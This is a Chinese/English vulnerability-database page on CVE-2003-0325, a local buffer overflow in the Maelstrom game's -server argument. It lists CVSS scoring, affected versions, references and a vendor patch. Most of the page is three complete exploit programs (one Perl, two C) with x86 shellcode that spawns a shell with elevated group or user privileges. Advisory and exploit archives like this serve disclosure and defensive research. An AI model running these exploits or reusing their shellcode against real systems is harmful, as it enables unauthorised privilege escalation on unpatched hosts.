CVE-2003-0325
CVSS4.6
发布时间 :2003-06-09 00:00:00
修订时间 :2016-10-17 22:32:29
NMCOES    

[原文]Buffer overflow in Maelstrom 3.0.6, 3.0.5, and earlier allows local users to execute arbitrary code via a long -server command line argument.


[CNNVD]Maelstrom Server参数本地缓冲区溢出漏洞(CNNVD-200306-046)

        
        Maelstrom一款在线游戏程序。
        Maelstrom对用户提交的参数缺少充分的边界缓冲区检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以'games'组权限在系统上执行任意指令。
        提交超长的字符串作为'/usr/bin/Maelstrom'程序,可触发缓冲区溢出,精心构建提交数据可能以'games'组权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ambrosia_software:maelstrom:3.0.6
cpe:/a:ambrosia_software:maelstrom:3.0.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0325
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0325
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-046
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105337792703887&w=2
(UNKNOWN)  BUGTRAQ  20030518 Maelstrom Buffer Overflow
http://marc.info/?l=bugtraq&m=105344501331344&w=2
(UNKNOWN)  BUGTRAQ  20030519 Maelstrom exploit
http://marc.info/?l=bugtraq&m=105346309123217&w=2
(UNKNOWN)  BUGTRAQ  20030520 Maelstrom Local Buffer Overflow Exploit, FreeBSD 4.8 edition

- 漏洞信息

Maelstrom Server参数本地缓冲区溢出漏洞
中危 边界条件错误
2003-06-09 00:00:00 2005-10-20 00:00:00
本地  
        
        Maelstrom一款在线游戏程序。
        Maelstrom对用户提交的参数缺少充分的边界缓冲区检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以'games'组权限在系统上执行任意指令。
        提交超长的字符串作为'/usr/bin/Maelstrom'程序,可触发缓冲区溢出,精心构建提交数据可能以'games'组权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Sam Lantinga
        ------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Andrew Church Patch maelstrom-3.06.patch
        
        http://downloads.securityfocus.com/vulnerabilities/patches/maelstrom-3.06.patch

- 漏洞信息 (22613)

Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (1) (EDBID:22613)
freebsd local
2003-05-20 Verified
0 Luca Ercoli
N/A [点击下载]
source: http://www.securityfocus.com/bid/7630/info

Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.

The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games. 

#!/usr/bin/perl
# kokanin/DSR, gid games crap for /usr/ports/games/maelstrom -server bug
found by
# Luca Ercoli. This (ret/offset/shellcode) is made for FreeBSD 4.8-RELEASE.
# maelstrom-3.0.5     Asteroids-style game for X Window System
# shellcode by eSDee, he's cool. AV crap + .pl files + mailinglists ==
flooded mbox #¤%
$len = 1000;
$ret = pack("l",0xbfbffb7f);
$nop = "\x90";
$offset = 0;
$shellcode =    "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
                "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
                "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

for ($i = 0; $i < $len - length($shellcode); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer;
$cakeman = "1\@A" . $ret x 255 ;
exec("/usr/X11R6/bin/Maelstrom  -server $cakeman");

		

- 漏洞信息 (22614)

Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (2) (EDBID:22614)
freebsd local
2003-05-23 Verified
0 ph4nt0m
N/A [点击下载]
source: http://www.securityfocus.com/bid/7630/info
 
Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.
 
The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games. 

/*  /usr/bin/Maelstrom local exploit
*** Sorry for my poor english.
*** Others exploit can't exploit my Maelstrom,So I
wrote this exploit just for fun.
*** I can't get a rootshell on my linux ,because it's
not SUID.
*** If it SUID ,this exploit can make you get a rootshell.
*** Tested on redhat9.0 ,other linux maybe OK,too.
***
*** Thanks netric's good paper.
*** You can downlocd it here
http://www.netric.org/papers/envpaper.pdf
*** This paper make me write this exploit don't need to
guess ret.
*** Thanks jsk and axis for their help.
***
*** CONTACT:OYXin@ph4nt0m.net
*** COPYRIGHT (c) 2003 PH4NT0M SECURITY
*** http://www.ph4nt0m.net
*** 2003.5.23

Coded by OYXin(ph4nt0m)
Welcome to http://www.ph4nt0m.net

*/
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

#define  bufsize 8179

/*  linux x86 shellcode by bob from dtors.net,23
bytes,thx them.  */
static char shellcode[] =



   "\x31\xdb"
    "\x89\xd8"
    "\xb0\x17"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x17"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x2e"
    "\xcd\x80"
    "\x31\xc0"
    "\x50"
    "\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e"
    "\x89\xe3"
    "\x50"
    "\x53"
    "\x89\xe1"
    "\x31\xd2"
    "\xb0\x0b"
    "\xcd\x80"
     "\x31\xdb"
    "\x89\xd8"
    "\xb0\x01"
    "\xcd\x80";

int main(int argc,char *argv[]){
    char buf[bufsize+1];
    char*prog[]={"/usr/bin/Maelstrom","-server",buf,NULL};
    char  *env[]={"HOME=/root",shellcode,NULL};
    unsigned long ret;


    ret=0xc0000000-sizeof(void*)-strlen(prog[0])-strlen(shellcode)-0x02;

    memset(buf, 0x90, bufsize);
    memset(buf,0x32,sizeof("1"));
    memset(buf+1,0x40,sizeof("1"));
    memcpy(&buf[bufsize-(sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(2*sizeof(ret))], &ret,sizeof(ret));

    memcpy(&buf[bufsize-(3*sizeof(ret))], &ret,sizeof(ret));

    memcpy(&buf[bufsize-(4*sizeof(ret))], &ret,sizeof(ret));
    buf[bufsize] = '\0';

    execve(prog[0],prog,env);

    return  0;
}
		

- 漏洞信息 (22615)

Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (3) (EDBID:22615)
freebsd local
2003-05-20 Verified
0 CMN
N/A [点击下载]
source: http://www.securityfocus.com/bid/7630/info
  
Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.
  
The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games. 

/*
 * Maelstrom exploit By CMN <cmn@darklab.org>
 *
 * Tested on
 *
 * Maelstrom v1.4.3 (GPL version 3.0.6)
 *  from Maelstrom-3.0.6-1.i386.rpm
 *
 * Maelstrom v1.4.3 (Linux version 3.0.3)
 *  from Gentoo port
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

#define TARGET    "/usr/bin/Maelstrom"
#define BUFSIZE    8179
#define NOP        0x90
#define OFFSET     100

static char linux_code[] =
    "\xb9\xff\xff\xff\xff" /* movl    $-1, %ecx   */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x31"             /* movb    $0x31, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x46"             /* movb    $0x46, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x32"             /* movb    $0x32, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x47"             /* movb    $0x47, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xd2"             /* xorl    %edx, %edx  */
    "\x52"                 /* pushl   %edx        */
    "\x68\x2f\x2f\x73\x68" /* pushl   $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl   $0x6e69622f */
    "\x89\xe3"             /* movl    %esp, %ebx  */
    "\x52"                 /* pushl   %edx        */
    "\x53"                 /* pushl   %ebx        */
    "\x89\xe1"             /* movl    %esp, %ecx  */
    "\xb0\x0b"             /* movb    $0xb, %al   */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\x40"                 /* inc     %eax        */
    "\xcd\x80";            /* int     $0x80       */

int
main(int argc, char *argv[])
{
    int ret = (u_long)(&ret);
    u_char *target = TARGET;
    u_char buf[BUFSIZE+1];
    long offset = 0;
    int i;

    memset(buf, NOP, BUFSIZE);
    buf[BUFSIZE] = '\0';
    buf[0] = '2';
    buf[1] = '@';
    memcpy(&buf[BUFSIZE-(strlen(linux_code)+4*sizeof(ret))],
        linux_code, strlen(linux_code));

    while ( (i = getopt(argc, argv, "t:o:")) != -1) {

        switch(i) {
            case 't':
                target = optarg;

            case 'o':
                offset = strtol(optarg, NULL, 0);
                break;

            default:
                printf("\nUsage: %s [-t target ] [-o offset]\n\n", argv[0]);
                exit(EXIT_FAILURE);
        }
    }

    ret -= offset ? offset : OFFSET;
    memcpy(&buf[BUFSIZE-(sizeof(ret))], &ret, sizeof(ret));
    memcpy(&buf[BUFSIZE-(2*sizeof(ret))], &ret, sizeof(ret));
    memcpy(&buf[BUFSIZE-(3*sizeof(ret))], &ret, sizeof(ret));
    memcpy(&buf[BUFSIZE-(4*sizeof(ret))], &ret, sizeof(ret));

    printf("Using address 0x%08lx\n", ret);
    printf("Target is '%s'\n", target);
    execlp(target, "CMN", "-server", buf, (char *)NULL);
    perror("execle()");
    exit(EXIT_FAILURE);
}

		

- 漏洞信息

8441
Maelstrom -server Command-Line Argument Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-05-18 Unknow
2003-05-20 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Maelstrom Server Argument Buffer Overflow Vulnerability
Boundary Condition Error 7630
No Yes
2003-05-20 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to Luca Ercoli <luca.ercoli@inwind.it>.

- 受影响的程序版本

Sam Lantinga Maelstrom 3.0.6
Sam Lantinga Maelstrom 3.0.5
Sam Lantinga Maelstrom 3.0.3

- 漏洞讨论

Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.

The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games.

- 漏洞利用

The following proof of concept exploits have been submitted by CMN &lt;cmn@darklab.org&gt; and kokanin &lt;kain@ircop.dk&gt; respectively:

- 解决方案

Andrew Church has supplied an unsupported unofficial patch to address this issue for maelstrom version 3.0.6.

Gentoo has released an advisory for this issue. Gentoo can apply the app-games/maelstrom upgrade to maelstrom-3.0.6 with the following commands:

emerge sync
emerge maelstrom
emerge clean


Sam Lantinga Maelstrom 3.0.6

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站